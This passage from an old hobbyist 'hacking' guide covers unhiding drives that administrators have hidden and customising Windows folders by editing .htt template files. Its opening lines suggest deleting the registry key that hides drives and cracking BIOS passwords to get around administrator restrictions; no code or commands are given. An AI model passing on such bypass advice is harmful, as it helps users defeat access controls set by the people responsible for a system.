The problem with most system administrators is that they think that the users or Hackers too are stupid. Almost all system administrators use the Registry Trick (Explained Earlier) to hide all drives in My Computer. So in order to unhide or display all drives, simply delete that particular key.(Refer to beginning of Untold Secrets Section.)
Some systems have the floppy disk disabled through the BIOS. On those systems if the BIOS is protected, you may need to crack the BIOS password. (For that Refer to the Windows Hacking Chapter). Sometimes making drives readable (Removing R +) and then creating Shortcuts to them also helps us to get access to them. Further Changing your Operating System's Looks by editing .htt files

If you have installed Windows Desktop Update and have the view as web Page option enabled, you can customise the way the folder looks by selecting View > Customise this folder. Here you can change the background and other things about that particular folder. Well that is pretty lame, right? We hackers already knowthings as lame as that. Read on for some kewl stuff.
Well, you could also change the default that is stored in a Hidden HTML Template file (I think so..) which is nothing but a HTML document with a .htt extension. This .htt file is found at:
%systemroot%\web\folder.htt.

The %systemroot% stands for the drive in which Windows is Installed, which is normally C:
You can edit these .htt files almost just like you edit normal .HTM or .HTML files. Simply open them in an ASCII editor like Notepad. The following is a list of .htt files on your system which control various folders and which can be edited to customise the way various folders look.
controlp.htt Control Panel

printers.htt Printers

mycomp.htt My Computer

safemode.htt Safe Mode

All these files are found in the web folder in %systemfolder%. The folder.htt file has a line:
'Here's a good place to add a few lines of your own" which is the place where you can add your own A HREF links. These links would then appear in the folder whose folder.htt file you
edited. All this might sound really easy and simple, but you see these .htt files do not contain normal HTML code, instead they contain a mixture of HTML and web bots. Hence they can be difficult for newbies to understand.